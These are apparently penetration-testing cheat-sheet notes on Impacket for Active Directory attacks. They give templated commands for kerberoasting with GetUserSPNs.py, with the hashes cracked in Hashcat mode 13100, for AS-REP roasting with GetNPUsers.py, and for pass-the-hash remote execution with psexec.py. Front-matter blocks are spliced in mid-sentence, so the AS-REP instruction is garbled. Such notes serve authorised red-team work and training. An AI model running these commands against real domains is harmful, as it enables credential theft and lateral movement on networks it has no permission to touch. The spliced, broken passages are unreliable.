permalink: spells/impacket
tags:
- Application/Impacket
- Application/PsExec
- Protocol/Kerberos
- OS/Windows/ActiveDirectoryImpacket can identify kerberoastable accounts and dump packets remotely. It comes standard with Kali Linux. The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).permalink: spells/kerberoasting-with-impacket
tags:
- OS/Windows/ActiveDirectory
- Protocol/Kerberos
- AttackCycle/Exploitation/Kerberoasting
- Application/Impacket
- Application/Hashcat
- OS/Linux/Distros/KaliKerberoasting with Impacket
GetUserSPNs.py ${DOMAIN}/${USER}:${PASSWORD} \
-dc-ip $DOMAIN_CONTROLLER_IP -request
Impacket (via GetNPUsers.py) support AS-REP roasting. However, GetNPUsers.py requires that user accounts already be enumerated and roastable accounts identified. When using GetNPUsers.py, specify the target as permalink: spells/as-rep-roasting-with-impacket
tags:
- OS/Windows/ActiveDirectory
- AttackCycle/Exploitation/AS-REPRoasting
- Application/Impacket
- Protocol/KerberosAS-REP roasting with Impacket
${DOMAIN}/ (i.e., leave off the user-part).
Impacket includes a reimplementation of PsExec. Under Linux (but not Windows) you can pass in an NTLM hash instead of a password for the target user.
# Psexec.py (but ONLY on Linux; this won't work on Windows!)
#
psexec.py -hashes $TARGET_USER_NTLM_HASH \
$TARGET_DOMAIN\$TARGET_USER@$TARGET_HOST